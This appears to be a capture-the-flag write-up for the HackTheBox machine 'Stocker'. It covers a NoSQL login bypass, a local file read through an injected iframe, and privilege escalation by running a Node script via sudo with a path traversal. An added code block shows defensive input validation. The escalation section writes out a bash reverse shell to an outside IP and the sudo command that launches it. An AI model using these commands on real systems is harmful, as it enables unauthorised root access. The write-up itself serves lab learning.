Stocker
Enumeration
Ports and Services
Software Installed:
Nmap Scan Results:
WFuzz Subdomain Results
Gobuster dev.stocker.htb results
stocker.htb
dev.stocker.htb
Possible User from stocker.htb page
dev.stocker.htb is using Node.js and more than likely MongoDB
Modified login POST to json format and received an error:
Tried a simple NoSQL attack successfully:
Redid request and intercepted/modified
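The login bypass above works because a JSON body lets a field that should be a string arrive as an object, and an Express handler that drops that object straight into a Mongo filter turns the credential check into an operator match. The following is an added, defender-side example (not code from the box or the original writeup) of the input check such a handler should run first; the function names and field limits are assumed for illustration.

```javascript
// Added example: validate the JSON login body before it reaches a Mongo query.
// Function names (containsOperator, validateCredentials, buildLoginQuery) and
// the length limits are assumptions for illustration, not from the target app.

// Recursively check whether any key in the value begins with '$' or contains
// '.', the characters MongoDB interprets as operators and field paths.
function containsOperator(value) {
  if (Array.isArray(value)) return value.some(containsOperator);
  if (value !== null && typeof value === 'object') {
    return Object.entries(value).some(
      ([k, v]) => k.startsWith('$') || k.includes('.') || containsOperator(v)
    );
  }
  return false;
}

// Return the login fields only when both are plain strings of sane length.
// Throws otherwise, so the handler never builds a filter from object-shaped
// input such as {"username": {"$ne": null}}.
function validateCredentials(body) {
  if (body === null || typeof body !== 'object' || Array.isArray(body)) {
    throw new TypeError('body must be a JSON object');
  }
  const { username, password } = body;
  if (typeof username !== 'string' || typeof password !== 'string') {
    throw new TypeError('username and password must be strings');
  }
  if (username.length === 0 || username.length > 64 || password.length > 128) {
    throw new RangeError('credential length out of bounds');
  }
  // Also reject operator syntax in any other field, in case the handler
  // spreads the whole body into the query (e.g. an extra "$where" key).
  if (containsOperator(body)) {
    throw new TypeError('operator syntax is not allowed in login body');
  }
  return { username, password };
}

// Build the filter the vulnerable handler would have built directly from the
// body. After validation the username is guaranteed to be a string, so the
// filter can only match an exact value. The password is deliberately left out
// of the filter: compare it against the stored hash after the lookup instead.
function buildLoginQuery(body) {
  const { username } = validateCredentials(body);
  return { username };
}
```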
Purchased a red cup:
The link to view order:
The title field is susceptible to LFI:
Intercepted the cart Submit request and added an iframe referencing the /etc/passwd file:
Change the iframe size to 700px X 600px:
Initial Foothold
Using the previous error that disclosed the path, I was able to find index.js, which contains a user login:
SSH as angoose.
User.txt Proof Screenshot
Privilege Escalation
sudo -l
Created a JavaScript file to execute a bash script:
test.js
const execSync = require('child_process').execSync;
// import { execSync } from 'child_process'; // replace ^ if using ES modules
const output = execSync('/home/angoose/.tmp/rev.sh', { encoding: 'utf-8' }); // the default is 'buffer'
console.log('Output was:\n', output);
rev.sh:
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.21/8888 0>&1
CMD:
sudo /usr/bin/node /usr/local/scripts/../../../home/angoose/.tmp/test.js
Root Screenshot Here:
Root.txt Contents: